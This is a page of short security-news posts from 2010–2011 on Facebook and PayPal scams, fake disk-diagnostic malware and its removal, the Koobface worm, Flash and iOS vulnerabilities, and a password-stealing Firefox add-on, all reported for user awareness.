Fake Facebook Users Spreading Scam Messages

February 3, 2011 by  
Filed under Security News


I just saw new way of scams that spreading in Facebook as a messages with the same content of usually email scams about claiming prizes or money even the account who send the scam don’t have any personal information and friend, he just put the Facebook logo as a profile picture to be as Facebook team. (Watch Out and Take Care)


Read more

Warning: A New and Danger PayPal Phishing Scam Email

February 2, 2011 by  
Filed under Security News


I just received PayPal email and it said “Please Update Your Account”,  its not from PayPal its fake but the problem its duplicated  Frighteningly as PayPal site even when you open the link that included you will not doubt its fake, so see the video to know what I’m talking about.


Read more

Fake System Tools Spread to Japan

January 27, 2011 by  
Filed under Security News

Late last year, we talked about how fake system diagnostic tools were becoming the next step in the evolution of FAKEAV malware. These variants started to affect Japanese users as well.


Fake system diagnostic tools such as this variant named System Defragmenter were first discovered in October 2010. These tools very frequently change their names. At present, we are aware of at least 30 different names/aliases that these tools use. Cybercriminals may believe that changing their products’ names makes detecting and removing these much more difficult.


None of this should be taken to mean that conventional fake antivirus attacks have gone away, however. Last week, a very high-profile attack involving a rogue antivirus detected by Trend Micro as TROJ_FAKEAV.SMTV hit Twitter. Many users fell prey to this when they clicked links that used the goo.gl URL shortener to lead to this FAKEAV variant’s download.


Attacks involving fake diagnostic tools are similar to traditional FAKEAV attacks. A fake tool appears to function like a real system diagnosis tool though its supposed diagnostic functions never work. Once users’ PCs are infected by such a tool, these repeatedly displayed fake warnings saying that the system is suffering from hard disk problems.


Inexperienced users may worry and panic over these problems. They may end up paying for additional “tools” and giving cybercriminals their personal information such as email addresses and credit card numbers. Like FAKEAV, these fake diagnosis tools will cause many problems for users.


Infection Vectors

Fake diagnostic tools may arrive via several different infection vectors:

  • Users visit malicious sites and manually download and install malicious files.
  • Users visit malicious sites that are riddled with exploits, which silently install malicious files in the background.


The tactics cybercriminals use to distribute fake diagnostic tools are broadly similar to those used for FAKEAV malware. Cybercriminals may lead users to their own sites by using Black Hat Search Engine Optimization (SEO) poisoning or to compromised legitimate sites. Cases where these fake tools are installed without the users’ knowledge may lead them to think the fake tools are actually legitimate programs, allowing the attacks to succeed.


System Defragmenter is detected as TROJ_FAKEAL.GG. While the sites that distribute it are now inaccessible, similar attacks did not stop from being launched, albeit using constantly changing names and sites. Understanding how these attacks are conducted will help users avoid becoming their victims.


Its installer uses the same icon as Windows Update.

Fourteen minutes after the tool is installed, it displays a fake alert in the user’s notification area.



Here are some of the other names the fake diagnostic tools use:

  • Check Disk
  • Defragmenter
  • Disk Doctor
  • Disk Optimizer
  • Disk Repair
  • DiskOK
  • EasyScan
  • FastDisk
  • GoodMemory
  • Hard Drive Diagnostic
  • HDDControl
  • HDDDefragmenter
  • HDDDiagnostic
  • HDDFix
  • HDDHelp
  • HDDPlus
  • HDDLow
  • HDDRecovery
  • HDDRepair
  • HDDRescue
  • HDDTools
  • MemoryFixer
  • MyDisk
  • QuickDefrag
  • Scan Disk
  • Scanner
  • Smart HDD
  • Support Tool 2011
  • System Degragmenter
  • Ultra Defragger
  • Win Defrag
  • Win Defragmenter
  • Win Scanner


Solutions and Workarounds

Trend Micro free tools can clean systems that have been affected by System Defragmenter. However, users have to first go around one of this malware’s behaviors—monitoring the execution of applications—so that some security tools like HijackThis as well as files in the C:\Windows and C:\Program Files folder will not run and instead display the following:

Click for larger view


Users will have to terminate the malware process first. The procedure starts by determining the file name that malware used. To do this, follow these steps:

  1. Right-click the shortcut (System Defragmenter) on the desktop and select Properties.
  2. Check and note the file name, which is usually made up of random characters. In the following screenshot, the file name used was 1181500.exe.

Click for larger view
After taking note of the file name, open Task Manager by pressing Ctrl+Alt+Delete and use it to terminate the fake tool’s process.


Using HijackThis, take note of any or all of the registry entries that the malware added. HijackThis can then remove these entries to stop the malware from running whenever the system starts. (The suspicious entries have been enclosed in a red box.)


Click for larger view



Source: http://blog.trendmicro.com

Older Versions of the Yahoo! Toolbar may cause Internet Explorer to stop responding or unexpectedly close

December 24, 2010 by  
Filed under Security News


The third-party products that this article discusses are manufactured by companies that are independent of Microsoft.


Microsoft makes no warranty, implied or otherwise, about the performance or reliability of these products.



  • Internet Explorer has stopped working
  • Internet Explorer encountered a problem and needs to close



As a result of some changes made by Yahoo! older versions of the Yahoo! toolbar can cause Internet Explorer to stop responding or unexpectedly close.



To resolve this issue, Yahoo! and Microsoft recommend that you uninstall and reinstall the toolbar as follows:


Please have a pen and paper handy to write down the following information for your version of Windows and then perform those steps to resolve the issue on your computer:


For Windows XP

  1. Click Start, and then click Control Panel.
  2. Double-click  Add or Remove Programs.
  3. Scroll to and click Yahoo! Toolbar to select it, and then click Remove.
  4. Follow any confirmation prompts.
  5. Close Add or Remove Programs and then restart Internet Explorer to verify that the issue is resolved.
  6. To re-install the Yahoo! Toolbar to the latest version, please visit http://us.toolbar.yahoo.com/ and follow the steps on the website.


    For Windows 7 and Windows Vista

    1. Click Start, and then click Control Panel.
    2. Under Programs, click Uninstall a program.
    3. Scroll to and click Yahoo! Toolbar to select it, and then click Uninstall from the options above.
    4. Click Yes on the uninstall warning pop-up window.
    5. Close Uninstall a program and then restart Internet Explorer to verify that the issue is resolved.
    6. To re-install the Yahoo! Toolbar to the latest version, please visit http://us.toolbar.yahoo.com/ and follow the steps on the website.




    Cross-platform worm targets Facebook users

    October 29, 2010 by  
    Filed under Security News

    A new member of the Koobface family of malware has been making the headlines in the last 24 hours. The reason why the threat, which is sometimes being referred to as “Boonana”, has been getting so much attention is that it doesn’t just infect Windows, but targets Mac OS X and Linux computers too.


    This incarnation of the Koobface worm appears to have been spread via Facebook in messages asking “is this you in this video”.


    IMPORTANT! PLEASE READ. Hi <username>. Is this you in this video here : <link>


    Clicking on the link takes you to an external website that displays an image of a woman (grabbed from the Hot Or Not website).


    Lady's picture


    Visitors to the webpage who want to see more are prompted to give permission for an applet called JPhotoAlbum.class to be run from inside a Java Archive (JAR) called JNANA.TSA.


    Warning message

    Warning message


    Whether you are running Windows, Mac OS X or Linux on your computer, if you give permission for the highly obfuscated Java app to run then the malware will sneakily download a variety of programs from the internet which it will then execute on your computer.


    Files which can be downloaded include:



    Sophos detects various components of the attack as Troj/KoobStrt-A, Troj/KoobInst-A, Troj/KoobCls-A, Troj/Agent-PDY, Troj/DwnLdr-IOX, and Troj/DwnLdr-IOY. In addition, Sophos’s web protection blocks access to the malicious webpages.


    Don’t forget to always be careful about what links you click on, even if they appear to have been shared by someone you know on Facebook.


    And if you’re a user of Linux or Mac OS X, don’t think that the malware problem only exists on Windows. Malicious hackers are becoming increasingly interested in targeting other platforms, and if users of your operating system have a reputation for being dismissive of malware warnings on your preferred OS, the bad guys may consider you a soft target.


    By Graham Cluley @ nakedsecurity.sophos.com




    Adobe races to patch zero-day vulnerability in Flash Player

    September 26, 2010 by  
    Filed under Security News

    Adobe has issued a security advisory about an as-yet unpatched vulnerability in its popular Flash Player software, affecting users of Windows, Mac, Linux, Solaris and even Google Android.


    The critical security hole could allow an attacker to take control of your computer and run malicious code.


    The firm also confirmed that the vulnerability also affects Adobe Reader 9.3.4 for Windows, Mac and UNIX, and Adobe Acrobat 9.3.4 and earlier versions for Windows and Mac. The reason that Acrobat and Reader are also affected is because the programs support Flash content inside PDF files


    The new warnings follow closely after news last week of another vulnerability in Reader and Acrobat that was being exploited by malware authors.


    Adobe has announced that an update for Flash Player tackling the latest vulnerability is expected to be available during the week of September 27, and an update for Acrobat and Reader will be available the following week.


    Last month, Sophos blogger Chet Wisniewski interviewed Brad Arkin, Adobe’s Senior Director of Product Security and Privacy, about the firm’s security strategy and their upcoming sandboxing technology.


    You can also download the interview directly in MP3 format.



    Read More…


    GFI Labs Issues Labor Day Phishing Warning

    September 3, 2010 by  
    Filed under Security News

    Online holiday retail sales traditionally serve as prime platform for attacks

    GFI Software security researchers issued a warning today regarding an expected increase in phishing attacks in relation to the upcoming Labor Day holiday. GFI Labs, the dedicated malware research center of GFI Software, warns that consumers are traditionally at high risk for targeted phishing attacks due to the preponderance of online retail sales events over the holiday weekend.


    Amidst the flurry of emails promoting holiday sales are fraudulent messages that include bogus links to sites that download malicious software or phishing sites soliciting personal information. While research from companies like IBM have suggested that phishing attacks were on the decline last year, GFI Labs warns that customers should not be lulled into a false sense of security. According to phishing tracker Phishtank.com, there are over 2,900 active phishing web sites currently verified on the internet. Furthermore, the popularity of social media sites such as Facebook and Twitter has made them attractive platforms for holiday-themed attacks.


    According to GFI Software, one of the world’s leading providers of security software, consumers can reduce their risk of infection by following three simple rules:


    1)    Ensure that your computer is protected against the newest malware threats by installing a combined antivirus and antispyware solution.  This serves as the first point of protection against dangerous viruses and Trojans – and one without the other is no longer effective.


    2)    Never click on a link from an email to make a credit card purchase.  The email you’ve received may look legitimate, but there’s a high probability that the link will take you to a spoofed site where your credit card information will be recorded by cyber criminals.  Instead, navigate to the retailer’s Web site directly through your browser.  Again, the email may look harmless, but it’s better to be safe than sorry.


    3)    Even when visiting a trusted Web site, be vigilant about anything that looks out of the ordinary.  Social networking sites like Facebook, Twitter and MySpace have all served as points of infection recently.  Do not download anything, even from a trusted site, unless you are 100% sure of its contents.


    “Every Labor Day, we see a wave of phishing attacks taking advantage of consumers’ expectations of increased retail email promotions connected with the holiday,” said Tom Kelchner, research center manager, GFI Labs. “Cyber criminals see an opportunity to slip by unnoticed among the legitimate promotions. Along with making sure virus updates and security software patches are current, consumers need to stay vigilant and use common sense in order to avoid any unnecessary headaches that these fraudulent emails look to deliver over the long weekend.”


    About GFI
    GFI Software provides web and mail security, archiving and fax, networking and security software and hosted IT solutions for small to medium-sized enterprises (SME) via an extensive global partner community. GFI products are available either as on-premise solutions, in the cloud or as a hybrid of both delivery models. With award-winning technology, a competitive pricing strategy, and a strong focus on the unique requirements of SMEs, GFI satisfies the IT needs of organizations on a global scale. The company has offices in the United States (North Carolina, California and Florida), UK (London and Dundee), Austria, Australia, Malta, Hong Kong, Philippines and Romania, which together support hundreds of thousands of installations worldwide. GFI is a channel-focused company with thousands of partners throughout the world and is also a Microsoft Gold Certified Partner.



    JailbreakMe: Apple issues emergency iPhone/iPad security patch

    August 12, 2010 by  
    Filed under Security News

    Apple has kept true to its promise, and released a security patch for users of iPhones, iPads and the iPod Touch, closing the door on a vulnerability that could have exposed them to malware and other malicious attacks.


    The vulnerability first came to the public’s attention after it was used by a website, JailbreakMe.com, which made it simple for iPhone and iPad users to jailbreak their devices.


    As I reported earlier this month, the drive-by jailbreak exploited a vulnerability in the way that the mobile edition of Safari (the default browser used in the iOS operating system) handles PDF files – specifically its handling of fonts. Therefore, just visiting the JailbreakMe website could run code on the visitor’s iPhone, iPod Touch or iPad.


    Such a vulnerability, if left unpatched, leaves open opportunities for hackers to spread malicious code to Apple’s mobile products.


    iOS 4.0.2 for iPhone


    The iOS 4.0.2 update for iPhone and iPod Touch can be downloaded and installed using iTunes, with further information available in Apple’s support advisory HT4291.


    The same process can be used to update Apple iPads to version 3.2.3 of iOS, with detailed information about the vulnerability published on Apple’s support knowledgebase.


    Read More…



    JailbreakMe: Security warning for iPhone and iPad owners

    August 5, 2010 by  
    Filed under Security News

    A website that has made it simple for iPhone and iPad users to jailbreak their devices may not just be a headache for Apple, but also a portent for future malicious attacks.


    Owners of Apple gadgets who visit the JailbreakMe website in Safari have found that all they need to jailbreak their device is slide a button to give permission, opening up the possibility of installing apps that have not been approved by the official AppStore.


    Previously, jailbreaking has required users to connect their device to a computer before they can start to tamper with the set-up of their iPhone or iPad and gain access to the Cydia underground app store.




    The drive-by jailbreak is possible because the website exploits a vulnerability in the way that the mobile edition of Safari (the default browser used in the iOS operating system) handles PDF files – specifically its handling of fonts.


    As a number of YouTube videos have demonstrated, it’s a pretty slick process:


    What concerns me, and others in the security community, however, is that if simply visiting a website with your iPhone can cause it to be jailbroken – just imagine what else could hackers do by exploiting this vulnerability? Cybercriminals would be able to create booby-trapped webpages that could – if visited by an unsuspecting iPhone, iPod Touch or iPad owner – run code on visiting devices without the user’s permission.


    Read More…



    Mozilla pulls password-sniffing Firefox add-on

    July 15, 2010 by  
    Filed under Security News

    Mozilla has issued a warning that a Firefox add-on available from the official Mozilla Add-Ons website was secretly sending users’ stolen passwords to a remote location.


    “Mozilla Sniffer” was uploaded to the Firefox add-on site on June 6th, but was only determined at the start of this week to contain code that sent the contents of website login forms to a remote location.


    In other words, if you installed this add-on (and according to Mozilla about 1800 people did) then everytime you entered your password on a website you were potentially handing over your confidential login details to an unknown party.


    And this isn’t the first time that Firefox add-ons have made the security headlines. For instance, earlier this year Mozilla revealed that the Master Filer add-on was infected by the LdPinch password-stealing Trojan.


    Back then Mozilla said it would strengthen its vetting procedures, scanning all add-ons with additional anti-virus tools. Clearly that wasn’t enough in this latest breach, and there is a proposal to introduce a requirement that all add-ons be code-reviewed before they are published on the site. More details on this proposal are available in a document about the new review model.


    Mozilla has now block-listed the “Mozilla Sniffer” add-on, meaning that users who are already running the code will be promoted to remove it.


    If you’re one of the potential victims, however, I would go further than just removing the add-on. Make sure you change your passwords too.



    Read More…


    Next Page »